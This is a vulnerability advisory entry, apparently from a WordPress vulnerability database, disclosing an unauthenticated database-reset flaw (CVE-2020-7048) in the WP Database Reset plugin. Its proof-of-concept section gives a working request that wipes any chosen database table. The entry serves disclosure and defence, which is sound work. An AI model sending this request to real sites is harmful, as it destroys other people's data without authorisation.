WP Database Reset < 3.15 - Unauthenticated Database Reset



Description
This flaw "allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state."
Proof of Concept
URL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111

Where you can set db-reset-tables%5B%5D to any database table you want to delete.

Affects Plugin

fixed in version 3.15

References

CVE 2020-7048
URL https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 2802
Verified No
WPVDB ID 10027

Timeline

Publicly Published 2020-01-16 (6 months ago)
Added 2020-01-16 (6 months ago)
Last Updated 2020-01-17 (6 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin